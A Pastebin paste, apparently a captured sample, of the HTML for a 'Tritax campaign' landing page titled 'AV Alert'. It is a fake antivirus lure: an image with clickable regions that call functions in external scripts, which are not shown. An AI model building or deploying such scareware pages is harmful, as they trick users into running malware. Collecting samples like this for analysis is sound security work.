Advertisement
ydklijnsma

Tritax campaign landing page V3

Feb 2nd, 2014
1,663
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 1.25 KB | None | 0 0
  1. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
  2. <html>
  3.     <head>
  4.         <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
  5.         <meta content="IE=5.0000" http-equiv="X-UA-Compatible">
  6.         <meta name="GENERATOR" content="MSHTML 10.00.9200.16660">
  7.         <script src="scr1.js"></script>
  8.            
  9.         <title>AV Alert</title>
  10.     </head>
  11.     <body topmargin="0" leftmargin="0" bgcolor="#ffffff">
  12.         <table width="100%" height="99%" border="0" cellspacing="0" cellpadding="0">
  13.             <tbody>
  14.                 <tr align="center" valign="middle">
  15.                     <td>
  16.                         <img width="617" height="345" id="al" src="message.png" border="0" usemap="#maper">
  17.                         <map name="maper">
  18.                             <area onmousedown="helloworld();" shape="rect" coords="544,12,593,33">
  19.                             <area style="cursor: pointer;" onmousedown="thisisit=0;" onclick="michael();" shape="rect" coords="480,287,578,308">
  20.                         </map>
  21.                     </td>
  22.                 </tr>
  23.             </tbody>
  24.         </table>
  25.         <div id="contentInner"></div>
  26.         <script src="scr2.js"></script>
  27.          
  28.     </body>
  29. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement